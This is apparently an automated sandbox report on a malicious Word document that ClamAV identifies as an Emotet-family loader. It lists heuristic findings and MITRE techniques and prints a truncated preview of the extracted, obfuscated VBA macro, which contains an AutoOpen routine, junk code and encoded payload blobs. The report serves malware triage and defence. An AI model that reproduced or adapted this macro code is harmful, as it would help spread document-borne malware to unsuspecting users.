MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and configured to execute a payload using CreateObject. The ClamAV detection and heuristic firings strongly indicate malicious intent, likely to download and execute a second-stage payload. The presence of the AutoOpen macro and the use of CreateObject are common indicators of macro-based malware.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39974 bytes |
SHA-256: 2d4abacbcfc0d148b6cc1861152f39097354308447e2bcf12cb2fcf270ae0543 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 24 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NCzHQsXJMZZmM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
EfPzaz = CByte(uolYwX)
UOVZIT = fMHnwq
iLtwZ = Cos(11855 - Oct(85566 + AswMZf * BnOVbp - CBool(bKnTD)))
Application.Run THLdH + "FfpDWOmzHSOojF" + LcrcYQ, sNdcwu + NLGqwLnjQrj + uKTZb
LTjjJ = CByte(DSIth)
EoTIJ = qEdwB
hqYpfI = Cos(76454 - Oct(74427 + sZssI * RNfkU - CBool(JrGtlA)))
End Sub
Attribute VB_Name = "jWlPSkBS"
Sub NnzFuQ(ObPBs)
qwMjC = CByte(wSwtH)
DfHKaH = AkArk
BsfrS = Cos(42532 - Oct(98538 + KjnCl * cTOQus - CBool(qlEEBH)))
End Sub
Function NLGqwLnjQrj()
On Error Resume Next
dZmqAC = CByte(wcGiL)
DtLTa = BKDzC
mwcVSr = Cos(74801 - Oct(52637 + zFujrI * lGszc - CBool(zumKS)))
MmPuwfEWw = TtJpwT("fL4mADEAOQAyADMANwKjq", 4 + UjiaMQ - UjiaMQ, 15 + UjiaMQ - UjiaMQ)
Mhabk = CByte(OFjaKO)
jVEnRn = EcYzFF
RzhiH = Cos(47668 - Oct(72608 + FZdJi * CsLvdF - CBool(ztGVXk)))
AisdzR = CByte(uiBUN)
tAwWpY = jhPjul
EpKAT = Cos(8925 - Oct(64571 + zHtfC * WMSNoi - CBool(ZITFj)))
TWDsID = TtJpwT("muQA3ADcAOQA3AD4j6c", 3 + kIdWfj - kIdWfj, 13 + kIdWfj - kIdWfj)
OTTMi = CByte(BFEUA)
IQlCp = JWtNUw
GGFij = Cos(82180 - Oct(91336 + ASoduK * AmRrR - CBool(fNZXS)))
cEJpc = CByte(fmNTPN)
wntjlH = FkVjim
YIBHZ = Cos(52893 - Oct(98958 + MJUAHQ * SnCfFl - CBool(BTdKNz)))
wCTKdWj = TtJpwT("8BtSjEAOABhADQAYwA1ADUAYwA5AGYAMQA3AGEANAA3ADMAZgA2ADEAZABiAGEANQA2ADMAOABkADMAOABjADcAMwAwAGYAYwA4ADkAZgA0ADEAYQA2ADUANAAxADgANwA1AGz5", 6 + vNKAwW - vNKAwW, 128 + vNKAwW - vNKAwW)
jdLpcH = CByte(LMpmjL)
jPlAha = hdwhj
GiiPNC = Cos(84950 - Oct(56520 + JKiJAH * NtZZES - CBool(sKjWb)))
ZfUQYj = CByte(iwpACV)
iuTizD = spsFjw
iFXofs = Cos(21177 - Oct(38541 + DSODmX * XhGFB - CBool(JFOAv)))
IDjdLvmudR = TtJpwT("5D8UigANwBmADQAYgAxADMAOAA4AGYAYQA1ADEAMAA3AGYANAAwAGIANwBkADkAZAA0ADYAYQA4ADcAMwA3ADUANQA4ADgAZAAzADMANgAyADEAYwA2AGEAMwAzADMAMQAwADAAYgA4ADMAMABlAGUAMgA1ADMil", 6 + zMItO - zMItO, 153 + zMItO - zMItO)
pcLskO = CByte(tSMWc)
KSPLjA = VXUYZt
IvRafz = Cos(59386 - Oct(59282 + rZioi * zLKdYq - CBool(tufzw)))
WfPVrU = CByte(SuiiQ)
wlUjIT = qKCcHm
KWPja = Cos(45318 - Oct(549 + POUTK * BfozCb - CBool(YEzliL)))
lvhQl = TtJpwT("qAGMAZQBiAGIAMAA5ADcAOQAzADgAZQAzAGEANgA2ADEAZABjAGUANQBhADQAOQBjAGEAYgAzADAAOQAxADAAMwA5AGUAZAAwAGIAMQAzADUAZQBiAGYAZgA2AGMAZQAwADYAZQBjAGYAZAA5AGYAYwAzADgAMQAzADUANQGHfk2GUz", 2 + RHnTr - RHnTr, 166 + RHnTr - RHnTr)
LdnNFQ = CByte(wfwIsZ)
VFPpIF = fOiFKZ
RQvvMH = Cos(12871 - Oct(73747 + GNtsFz * oJBwCw - CBool(vVFDjP)))
RzFfU = CByte(lZfCl)
kVPAjo = UaGLQ
rUIEH = Cos(4975 - Oct(89598 + PBNdY * MdZhH - CBool(adCuu)))
PEYXXpOD = TtJpwT("v1QAyAGUANwBjADZqj3", 3 + IurDi - IurDi, 13 + IurDi - IurDi)
aOFaL = CByte(oSdscU)
zqVUT = WKXqq
ZEqlO = Cos(35655 - Oct(27054 + GcfGo * bpFoTB - CBool(IHiFI)))
CaLko = CByte(iCwfFG)
liIBV = DtVnn
ULhmz = Cos(6417 - Oct(22426 + XavZF * jMqcX - CBool(wEfqXp)))
VzpzSwOT = TtJpwT("YABiADUAYgAxADYAZQBkADAAMgBkADIAMQA1AGYAZQBjADIANQBhADIAKiTLwIIU", 2 + sXqCYO - sXqCYO, 55 + sXqCYO - sXqCYO)
sZIhm = CByte(PURwP)
btiuKn = vHkrCs
vXPfr = Cos(30477 - Oct(18028 + TwPsIA * tOPbfv - CBool(OJVCnu)))
HQYZzZ = CByte(jckqQ)
wsFSOJ = Hofrj
rmiFr = Cos(13157 - Oct(9238 + VAwzz * GpmIVp - CBool(vauDvQ)))
aJksqtTzQpZ = TtJpwT("ZWAAOQA4ADcAOAA2AGQAZgAyAGYAYgAzADUAYQA0ADMAMABiAGYANwAzADcAZAA2AGUAZQBhADYAYwA1ADIANwBkAGMAMgBkADAANABiAGMAZQBjAGQAMwBmADIAZgA5ADQANQA0AGUAOABkAGUAYQAwAGEAYwA3ADkAZB1S58L", 3 + HhFpW - HhFpW, 163 + HhFpW - HhFpW)
VSlhp = CByte(iYBXsj)
XdrGS = UHRCW
ukvMk = Cos(2862 - Oct(92745 + owCPRK * GhoPQ - CBool(iJSinl)))
wndNv = CByte(JqdjA)
mBonu = HCiOk
miUiX = Cos(70341 - Oct(43421 + WLWRDk * KilFIY - CBool(SEFwwt)))
jwtMS = TtJpwT("IGYAYwAxADgANAAzAGIAZQBhADcANQA0ADAAYwA1ADgANQAzAGIAZAA1ADgAYgBmADQAYwA1AGEAYgA5ADUAZQBjADAAYQAyAGMAYwBjADIAZQAzAGMAZQA2AGYANwAyADEAZABjADQAOAA2ADuL40w0F", 2 + vJEQPL - vJEQPL, 145 + vJ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.